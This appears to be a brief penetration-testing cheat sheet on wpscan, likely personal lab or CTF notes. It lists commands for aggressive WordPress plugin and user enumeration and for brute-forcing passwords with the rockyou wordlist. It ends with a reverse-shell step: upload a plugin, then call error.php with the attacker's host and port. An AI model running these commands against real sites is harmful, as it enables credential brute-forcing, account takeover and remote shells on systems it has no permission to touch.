wpscan
Last updated
Last updated
wpscan --update --url http://192.168.120.66/ --enumerate ap --plugins-detection aggressive
wpscan --url http://$_target -e u --disable-tls-checks
wpscan --url http://$_target -e u --disable-tls-checks -U users.lst -P /usr/share/wordlists/rockyou.txt
If you have access to upload a plugin, you can get reverse shell with Conwell-Quotes
error.php?ip=$LHOST&port=$LPORT